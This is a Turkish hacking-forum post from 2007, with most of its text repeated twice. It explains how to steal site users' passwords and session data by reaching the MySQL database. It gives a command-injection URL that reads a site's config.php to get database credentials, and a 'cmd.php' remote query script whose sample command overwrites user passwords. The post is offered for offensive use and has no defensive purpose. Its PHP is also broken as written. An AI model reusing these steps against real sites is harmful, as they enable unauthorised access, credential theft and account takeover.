- 26 Haz 2007
- 19
- 0
Bildiginiz gibi SQL Verileri ve En önemLisi kullanıcıların şifrelerini HASH veya Normal olarak saklamaktadır. SQL İnjection Dışında SQL ile bağlantı yapabilirsek Kullanıcıların şifrelerini veya SessionID'lerini ve Diğer Bilgilerini Çalabiliriz. Öncelikle Yapmamız Gereken SQL'e Connect Yapmaktır.
Öncelikle Connect yapabilmek için Bilmemiz Gereken
MYSQL Connect komutu
PHP Kodu:
Buraya kadar Normal Fakat Şu mantığı Düşünürsek;
Eğer MYSQL kullanıcı ismi ve şifresi elimize geçti ise, neler Yapabiliriz..
Hatırlarsanız PHP-Nuke'nin bir açığı var idi veya Diğer Scriptlerin SHELL Komutlarını kullandırabildigimiz bir komutta vardı.
Örnegin Deneme Sayfasında SHELL komutlarını kullanabilecegimiz bir açıga sahip olan bir siteyi düşünelim..
www.deneme.com/test.php?|cat%20config.php|
Şifreyi Öğrendiğimizi Farz Edersek
user: test
pass: salla
Şimdi ise Yapacagimiz Bir SQL Komutlarını CMD Formu ve cmd.php Hazırlamak Olacaktır
CMD Formunu olusturmasını size bırakıyorum ve cmd.php için bir örnek veriyorum.
SQL Uzaktan Bağlantı Mantıgına Göre Aşagıda ki Gibidir
PHP Kodu:
Alıntı:
<?php
$hackle = mysql_connect('$hedef', '$user', '$pass');
$sorgu = $cmd; // Şu Sekilde Yollayın: "UPDATE usertable SET pwd='$pwd' WHERE uid='$uid';";
if (!$hackle) {
die('Veritabanına Ulaşılamiyor Nedeni: ' . mysql_error());
}
else { echo 'Veritabanına Ulaşım Sağlandı..';
mysql_query($sorgu);
}
?>
Alıntı Degil Bakma Sen Ona
Belirginleşsin die Yaptim
Bu kadar Basit bir Olaydır
Yukarıda Yazdıgım Komut Sistemini Yaptigim Bir Araştırma Sayesinde MYSQL Query isimli Bir Program Sayesinde Yapabilirsin
emege saygı:::diablo
Öncelikle Connect yapabilmek için Bilmemiz Gereken
MYSQL Connect komutu
PHP Kodu:
<?php
mysql_connect('localhost', 'user', 'pass');
?>
mysql_connect('localhost', 'user', 'pass');
?>
Buraya kadar Normal Fakat Şu mantığı Düşünürsek;
Eğer MYSQL kullanıcı ismi ve şifresi elimize geçti ise, neler Yapabiliriz..
Hatırlarsanız PHP-Nuke'nin bir açığı var idi veya Diğer Scriptlerin SHELL Komutlarını kullandırabildigimiz bir komutta vardı.
Örnegin Deneme Sayfasında SHELL komutlarını kullanabilecegimiz bir açıga sahip olan bir siteyi düşünelim..
www.deneme.com/test.php?|cat%20config.php|
Şifreyi Öğrendiğimizi Farz Edersek
user: test
pass: salla
Şimdi ise Yapacagimiz Bir SQL Komutlarını CMD Formu ve cmd.php Hazırlamak Olacaktır
CMD Formunu olusturmasını size bırakıyorum ve cmd.php için bir örnek veriyorum.
SQL Uzaktan Bağlantı Mantıgına Göre Aşagıda ki Gibidir
PHP Kodu:
mysql_connect('http://site.com', 'test', 'salla');
Alıntı:
<?php
$hackle = mysql_connect('$hedef', '$user', '$pass');
$sorgu = $cmd; // Şu Sekilde Yollayın: "UPDATE usertable SET pwd='$pwd' WHERE uid='$uid';";
if (!$hackle) {
die('Veritabanına Ulaşılamiyor Nedeni: ' . mysql_error());
}
else { echo 'Veritabanına Ulaşım Sağlandı..';
mysql_query($sorgu);
}
?>
Alıntı Degil Bakma Sen Ona
Bu kadar Basit bir Olaydır
Yukarıda Yazdıgım Komut Sistemini Yaptigim Bir Araştırma Sayesinde MYSQL Query isimli Bir Program Sayesinde Yapabilirsin
emege saygı:::diablo
